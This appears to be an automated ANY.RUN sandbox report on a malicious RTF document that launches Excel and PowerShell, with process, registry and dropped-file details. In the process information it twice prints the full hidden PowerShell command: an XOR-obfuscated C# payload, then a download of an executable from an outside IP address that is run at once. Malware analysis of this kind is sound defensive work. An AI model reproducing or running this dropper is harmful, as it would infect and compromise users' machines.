File name:

f5229d97f733e858cec79e26a3b58ae2.doc

Full analysis: https://app.any.run/tasks/400d9f14-e995-4a37-b3fa-ac66ae28263a
Verdict: Malicious activity
Analysis date: February 19, 2019, 08:33:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

F5229D97F733E858CEC79E26A3B58AE2

SHA1:

74350F16BD71BE98D29189532D06A62F1CBC3E60

SHA256:

4E90CB9F4536BD2A1E79DCC42F757DFB22BD7110F54B2B1C41AA114637C9593C

SSDEEP:

1536:oZdHt5ieI52b1bFCu6hYlDOyb1t5ieI52b1bFCu6hYlDOyb1t5ieI52b1bFCu6hu:oHk5IU5IU5IU5IU5IpV7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3836)
      • EXCEL.EXE (PID: 3760)
      • EXCEL.EXE (PID: 2616)
      • EXCEL.EXE (PID: 3584)
      • EXCEL.EXE (PID: 2488)

    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 3836)
      • EXCEL.EXE (PID: 2616)
      • EXCEL.EXE (PID: 3760)
      • EXCEL.EXE (PID: 3584)
      • EXCEL.EXE (PID: 2488)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3236)
      • powershell.exe (PID: 3212)
      • powershell.exe (PID: 2240)
      • powershell.exe (PID: 4048)
      • powershell.exe (PID: 3088)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2992)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2992)
      • EXCEL.EXE (PID: 3836)
      • EXCEL.EXE (PID: 2616)
      • EXCEL.EXE (PID: 3760)
      • EXCEL.EXE (PID: 2488)
      • EXCEL.EXE (PID: 3584)
      • excelcnv.exe (PID: 3208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Admin
LastModifiedBy: Admin
CreateDate: 2019:01:07 23:54:00
ModifyDate: 2019:01:07 23:54:00
RevisionNumber: 1
TotalEditTime: -
Pages: 1
Words: -
Characters: 4
CharactersWithSpaces: 4
InternalVersionNumber: 57435
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
22
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs excelcnv.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1812C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES928D.tmp" "c:\Users\admin\AppData\Local\Temp\CSC928C.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
2208"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\s5hzlapt.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function kb8cf { param($cca8c7) $kabe8 = 'd1c687'; $u7fd21c = ''; for ($i = 0; $i -lt $cca8c7.length; $i+=2) { $v1f4587 = [convert]::ToByte($cca8c7.Substring($i, 2), 16); $u7fd21c += [char]($v1f4587 -bxor $kabe8[($i / 2) % $kabe8.length]); } return $u7fd21c; } $r13b = '11420a585f17374810425d5a5f3c69434b5e0a564365414410540e186a420a450a5b5d192d5f17534a58146206444e5e0754100d353d1444015a515444520f574b44445052570d53533c694d353d44114316181744113872545b2d5c13594a434c1308534a59015d50041a1e393c6916181744114316184711530f5f5b1717450242515444541b425d450a112a584c67104343715d4334430c557953004306454b1f2d5f17664c4544592e595c4208544f164b4316580d511847165e0078595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944780d42684316112f5959532858014459451d1910424a5e0a564358595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944530c595417325811424d56086111594c5207454b7f5643344511165447255507445d44171d4363715910611744185313620a4c5d1b44440a584c17025d2d534f67165e17535b4348110c434c1711580d42185b14570f79545334430c425d541018583b3217441143161817446a275a547e09410c444c1f467a06445652080251185c5b08134f167d5910431a66575e0a45430b181536450f7b5741017c065b57451d134f166b52107d02454c7216430c44180a4457025a4b524d6c6e3c181744114316181717450242515444541b425d450a1115595153447c0c405d7a015c0c44411f2d5f17664c45445506454c1b44780d426843161110445b1b44580d4218440d4b061f033a6e3c6916181744114316184711530f5f5b1717450242515444580d42184f5d055457101e693b4316181744114316433a6e114316181744114316181744780d42684316111b550003520005160517285e0252745e06430244411f0f535b555e1f460156035b06540405070e0257015b035c154d18583b321744114316181744114316185e02114b4e5b0f50075250180a59112a584c6710434d6c5d450b186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e3c691618174411431618174411437f5643344511164256050857160517235417664a58077007524a5217424b4e5b0f5007525014170f535b555e1f460356035b06540405005a02500156035e05550550035d02550152020b154d18583b321744114316181744114316185e02114b4c59565d05430b05172d5f17664c454a6b0644571e693b431618174411431618174411183b3217441143161817441143161817441143445d4311430d16090c693b4316181744114316181744111e3b323a6e114316181744114316181744642a584c67104343524f640d4b061605174c642a584c6710434a03033a6e114316181744114316181744440a584c173e541159180a4401583b321744114316181744114316185e02114b176e5e164516575467165e17535b434c4b02570103481107416b5e1e544f16084f50014f165742101139534a584d186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e114316181744114316181744731a425d6c391133574c540c115e16431754495007141754490550141754495a06184a5f3c691618174411431618174411437f5643344511164d5909500d575f5200610c5f56430143430b187a0543105e595b4a700f5a57542c760f595a560819501f033a6e1143161817441143161817447c02444b5f055d4d7557471d1933574c540c1d43061417115f0e57565603540766575e0a45064414175718583b321744114316181744114316187a0b47067b5d5a0b431a1e565213112a584c6710434b4c59565d054d62577e0a455502101e441a430640075400011f1417115f0e57565603540766575e0a45064414175718583b3217441143161817441143161845014516445617540a6e3c1817441143161817193c693f314711530f5f5b17174502425154444217445159031108540054021910424a5e0a5643454c452d5f4a3b3217441143161817444a6e3c313e6d42174451590311160e0b0550085a160517465552550e0f5313583b321744114316181744114316184410430a585f17170951045a17591130424a5e0a564d7355471048583b32174411431618174411431618510b43431e515910110a160517540a435f180b4442174471594a7d06585f430c0a435f181c5911511f353d4411431618174411431618171f3c6916181744114316181744114316181744531a425d171c0350035d0506115e167b580a4706444c19305e214f4c524c42174471594a6216544b4316580d51105e4811511f141755074a0d353d441143161817441143161817441143164b0f56030116130a4419005e59454d191b040b02010301166617110950040c0e5d6a4b5f181844034a161d17110950040c0e5d1f2f53565010593e1f033a6e1143161817441143161817444c6e3c353d441143161817441143161817165417434a5944425b040a555f3c6916181744114316184a693b1e'; $r13b2 = kb8cf($r13b); Add-Type -TypeDefinition $r13b2; [a1a5d7]::x947a(); Start-Sleep -s 1; $re5963f = $env:APPDATA; $u2cbc1 = $re5963f + '\\ec449.exe'; If (test-path $u2cbc1) {Remove-Item $u2cbc1}; $ed74b = New-Object System.Net.WebClient; $ed74b.Headers['User-Agent'] = 'ed74b'; $ed74b.DownloadFile('http://http://139.99.186.18:80/xml/new.exe', $u2cbc1); Start-Process -Filepath $u2cbc1; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2264"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\lpgvf0nq.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2476C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESBD37.tmp" "c:\Users\admin\AppData\Local\Temp\CSCBD36.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
2488"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2616"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2992"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f5229d97f733e858cec79e26a3b58ae2.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3088"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function kb8cf { param($cca8c7) $kabe8 = 'd1c687'; $u7fd21c = ''; for ($i = 0; $i -lt $cca8c7.length; $i+=2) { $v1f4587 = [convert]::ToByte($cca8c7.Substring($i, 2), 16); $u7fd21c += [char]($v1f4587 -bxor $kabe8[($i / 2) % $kabe8.length]); } return $u7fd21c; } $r13b = '11420a585f17374810425d5a5f3c69434b5e0a564365414410540e186a420a450a5b5d192d5f17534a58146206444e5e0754100d353d1444015a515444520f574b44445052570d53533c694d353d44114316181744113872545b2d5c13594a434c1308534a59015d50041a1e393c6916181744114316184711530f5f5b1717450242515444541b425d450a112a584c67104343715d4334430c557953004306454b1f2d5f17664c4544592e595c4208544f164b4316580d511847165e0078595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944780d42684316112f5959532858014459451d1910424a5e0a564358595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944530c595417325811424d56086111594c5207454b7f5643344511165447255507445d44171d4363715910611744185313620a4c5d1b44440a584c17025d2d534f67165e17535b4348110c434c1711580d42185b14570f79545334430c425d541018583b3217441143161817446a275a547e09410c444c1f467a06445652080251185c5b08134f167d5910431a66575e0a45430b181536450f7b5741017c065b57451d134f166b52107d02454c7216430c44180a4457025a4b524d6c6e3c181744114316181717450242515444541b425d450a1115595153447c0c405d7a015c0c44411f2d5f17664c45445506454c1b44780d426843161110445b1b44580d4218440d4b061f033a6e3c6916181744114316184711530f5f5b1717450242515444580d42184f5d055457101e693b4316181744114316433a6e114316181744114316181744780d42684316111b550003520005160517285e0252745e06430244411f0f535b555e1f460156035b06540405070e0257015b035c154d18583b321744114316181744114316185e02114b4e5b0f50075250180a59112a584c6710434d6c5d450b186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e3c691618174411431618174411437f5643344511164256050857160517235417664a58077007524a5217424b4e5b0f5007525014170f535b555e1f460356035b06540405005a02500156035e05550550035d02550152020b154d18583b321744114316181744114316185e02114b4c59565d05430b05172d5f17664c454a6b0644571e693b431618174411431618174411183b3217441143161817441143161817441143445d4311430d16090c693b4316181744114316181744111e3b323a6e114316181744114316181744642a584c67104343524f640d4b061605174c642a584c6710434a03033a6e114316181744114316181744440a584c173e541159180a4401583b321744114316181744114316185e02114b176e5e164516575467165e17535b434c4b02570103481107416b5e1e544f16084f50014f165742101139534a584d186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e114316181744114316181744731a425d6c391133574c540c115e16431754495007141754490550141754495a06184a5f3c691618174411431618174411437f5643344511164d5909500d575f5200610c5f56430143430b187a0543105e595b4a700f5a57542c760f595a560819501f033a6e1143161817441143161817447c02444b5f055d4d7557471d1933574c540c1d43061417115f0e57565603540766575e0a45064414175718583b321744114316181744114316187a0b47067b5d5a0b431a1e565213112a584c6710434b4c59565d054d62577e0a455502101e441a430640075400011f1417115f0e57565603540766575e0a45064414175718583b3217441143161817441143161845014516445617540a6e3c1817441143161817193c693f314711530f5f5b17174502425154444217445159031108540054021910424a5e0a5643454c452d5f4a3b3217441143161817444a6e3c313e6d42174451590311160e0b0550085a160517465552550e0f5313583b321744114316181744114316184410430a585f17170951045a17591130424a5e0a564d7355471048583b32174411431618174411431618510b43431e515910110a160517540a435f180b4442174471594a7d06585f430c0a435f181c5911511f353d4411431618174411431618171f3c6916181744114316181744114316181744531a425d171c0350035d0506115e167b580a4706444c19305e214f4c524c42174471594a6216544b4316580d51105e4811511f141755074a0d353d441143161817441143161817441143164b0f56030116130a4419005e59454d191b040b02010301166617110950040c0e5d6a4b5f181844034a161d17110950040c0e5d1f2f53565010593e1f033a6e1143161817441143161817444c6e3c353d441143161817441143161817165417434a5944425b040a555f3c6916181744114316184a693b1e'; $r13b2 = kb8cf($r13b); Add-Type -TypeDefinition $r13b2; [a1a5d7]::x947a(); Start-Sleep -s 1; $re5963f = $env:APPDATA; $u2cbc1 = $re5963f + '\\ec449.exe'; If (test-path $u2cbc1) {Remove-Item $u2cbc1}; $ed74b = New-Object System.Net.WebClient; $ed74b.Headers['User-Agent'] = 'ed74b'; $ed74b.DownloadFile('http://http://139.99.186.18:80/xml/new.exe', $u2cbc1); Start-Process -Filepath $u2cbc1; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3132C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA7CB.tmp" "c:\Users\admin\AppData\Local\Temp\CSCA7CA.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
Total events
4 056
Read events
3 334
Write events
696
Delete events
26

Modification events

(PID) Process:(2992) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:"!0
Value:
22213000B00B0000010000000000000000000000
(PID) Process:(2992) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2992) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2992) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1314062357
(PID) Process:(2992) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1314062476
(PID) Process:(2992) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1314062477
(PID) Process:(2992) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
B00B0000981B5ADF2DC8D40100000000
(PID) Process:(2992) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:<"0
Value:
3C223000B00B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2992) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:<"0
Value:
3C223000B00B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2992) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
10
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
2992WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6D22.tmp.cvr
MD5:
SHA256:
3836EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR74B3.tmp.cvr
MD5:
SHA256:
3236powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FB2YCXE48AI2AO3D6UCX.temp
MD5:
SHA256:
2208csc.exeC:\Users\admin\AppData\Local\Temp\CSC7CB2.tmp
MD5:
SHA256:
2208csc.exeC:\Users\admin\AppData\Local\Temp\s5hzlapt.pdb
MD5:
SHA256:
3440cvtres.exeC:\Users\admin\AppData\Local\Temp\RES7CB3.tmp
MD5:
SHA256:
2208csc.exeC:\Users\admin\AppData\Local\Temp\s5hzlapt.dll
MD5:
SHA256:
2208csc.exeC:\Users\admin\AppData\Local\Temp\s5hzlapt.out
MD5:
SHA256:
3760EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8D6C.tmp.cvr
MD5:
SHA256:
2240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V319PEQABIZWHQ66FN78.temp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
Process
Message
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
f5229d97f733e858cec79e26a3b58ae2.doc